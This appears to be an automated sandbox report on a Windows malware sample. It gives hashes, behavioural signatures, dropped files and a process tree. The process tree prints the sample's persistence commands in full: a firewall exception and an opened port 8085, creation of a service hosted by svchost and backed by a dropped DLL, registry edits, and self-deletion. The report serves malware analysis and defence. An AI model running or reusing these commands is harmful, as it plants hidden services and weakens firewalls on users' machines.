Overview

overview

8

Static

static

3

5f3143c900...18.exe

windows7-x64

8

5f3143c900...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    24s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    20-07-2024 05:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe

  • Size

    338KB

  • MD5

    5f3143c9005305cc8d6948378c0a0e79

  • SHA1

    5c4048f06f6a79d0d7ae0d2f6da55e7b168dfd49

  • SHA256

    0c026dd1e317615a52a0f15b0834d91925bb976585f9e3bac5c96b0f41c1643e

  • SHA512

    f490010ddd45db028163c9c477fee0dc4872b75e816becd4929c0e602ef0d6885b984cbfa03401ab65ad20debf3e3326e6e18ace36415b75e303d3054d865073

  • SSDEEP

    6144:LiiUInLV5aQNbwXOH4MF2EigFTosv8lpRuFL3kM+:LinHYke3cEigFko8lWOb

Score
8/10
evasionexecutionpersistenceprivilege_escalation

Malware Config

Signatures

  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\SysWOW64\CmD.exe
      CmD /c copy /B "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe" "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe"
      2⤵
        PID:2908
      • C:\Windows\SysWOW64\CmD.exe
        CmD /c ""C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe" --uninstall > "C:\Users\Admin\AppData\Local\Temp\setup_winver.bat""
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2368
        • C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe" --uninstall
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2912
      • C:\Windows\SysWOW64\cMd.exe
        cMd /c "C:\Users\Admin\AppData\Local\Temp\setup_winver.bat"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\reg.exe
          reG aDd "hklm\SOFTWARE\Microsoft\Internet Explorer\Main" /v TP /t ReG_Sz /d "1000" /f
          3⤵
          • Modifies Internet Explorer settings
          PID:2784
        • C:\Windows\SysWOW64\netsh.exe
          NetSh FIReWAlL Add allOweDPrOgrAm naMe="FLEXlm License Service" prOGram="C:\Windows\system32\svchost.exe" mode=ENABLE
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2736
        • C:\Windows\SysWOW64\netsh.exe
          nETsH fIrEwaLl aDD pOrToPEnIng tcP 8085 "HASPNT" eNABLe
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2060
        • C:\Windows\SysWOW64\sc.exe
          Sc CreATe "flexsrv" tyPE= share start= auto binPaTh= "C:\Windows\system32\svchost.exe -k netwisvc" DisplayName= "Object Protocol Logical Slip Driver CryptPKO Handler Download"
          3⤵
          • Launches sc.exe
          PID:2132
        • C:\Windows\SysWOW64\reg.exe
          rEg adD "hkLm\sYsTEm\CuRrenTcoNtRoLSeT\seRvIcES\flexsrv\Parameters" /v ServiceDll /t ReG_EXpaND_Sz /d "C:\Windows\system32\dimax.dll" /f
          3⤵
          • Server Software Component: Terminal Services DLL
          PID:2916
        • C:\Windows\SysWOW64\reg.exe
          rEg adD "hkLm\sYsTEm\CuRrenTcoNtRoLSeT\seRvIcES\flexsrv" /v FailureActions /t rEG_BInaRY /d 00000000000000000000000003000000140000000100000060EA00000100000060EA00000100000060EA0000 /f
          3⤵
            PID:2948
          • C:\Windows\SysWOW64\reg.exe
            ReG adD "hklm\SOfTwaRe\mIcrOSoFt\WiNdoWs nt\CURrENtveRSiOn\svcHoSt" /v netwisvc /t rEg_mULti_sz /d "flexsrv\0" /f
            3⤵
              PID:2660
            • C:\Windows\SysWOW64\sc.exe
              sc start "flexsrv"
              3⤵
              • Launches sc.exe
              PID:300
            • C:\Windows\SysWOW64\sc.exe
              sc boot ok
              3⤵
              • Launches sc.exe
              PID:2744
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /flushdns
              3⤵
              • Gathers network information
              PID:2648
        • C:\Windows\SysWOW64\svchost.exe
          C:\Windows\SysWOW64\svchost.exe -k netwisvc
          1⤵
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2768

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\dimax.dll
          Filesize

          184KB

          MD5

          70c79b3f59de49550131c1f0a044726c

          SHA1

          b70d19dd619847d885b26c1d917d8cc5aa6e51be

          SHA256

          5ef25fce78378a4e912a53a41987dfd8e4ad033e193d8373866626744d57e1dd

          SHA512

          4636ebf5e695845df5fc0ed4f355e2c6e567018a2fab1b0d012ae23170904db278798d7296a15d73f205bced1d27692dc5e74944473fb5b7821cc3b22378c8d6

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\hlemunt.sys
          Filesize

          42KB

          MD5

          9d1e852815ab22661e2b19d004e14aef

          SHA1

          5918c2320609e341ac3b3bac5ed15890e92574f4

          SHA256

          f20dff429ca8931b4bcb71d28f6449d7ee7dfb7f10f85c9f634b1a08dbc29fb3

          SHA512

          2877dcfe36bf9ec3b6560c5ba811a68808320828f87cd5183b334bd5d7528f510a6b83300f68c59505fde73145f16648e4d680a1b5384c8951bf572d3879becc

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\setup_winver.bat
          Filesize

          1KB

          MD5

          6568ffd046fdb73f5a179ce0b0b162c2

          SHA1

          4e25ef697f3875dcc57d279b67e935f7ba5c5ece

          SHA256

          5cf26e532474b6d1344dde1c984cca7c8d82b736aecf5fb2e1f1931ec1861838

          SHA512

          d69b2e1ab9907f993b31846964009bb249a756a189f2b925ae170ff7baed0ea6c49caf460330a88e3f225a6cb77193b578ce061584cf0bc06b0142e96c81c2b3

          Download Submit

        • \Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe
          Filesize

          338KB

          MD5

          5f3143c9005305cc8d6948378c0a0e79

          SHA1

          5c4048f06f6a79d0d7ae0d2f6da55e7b168dfd49

          SHA256

          0c026dd1e317615a52a0f15b0834d91925bb976585f9e3bac5c96b0f41c1643e

          SHA512

          f490010ddd45db028163c9c477fee0dc4872b75e816becd4929c0e602ef0d6885b984cbfa03401ab65ad20debf3e3326e6e18ace36415b75e303d3054d865073

          Download Submit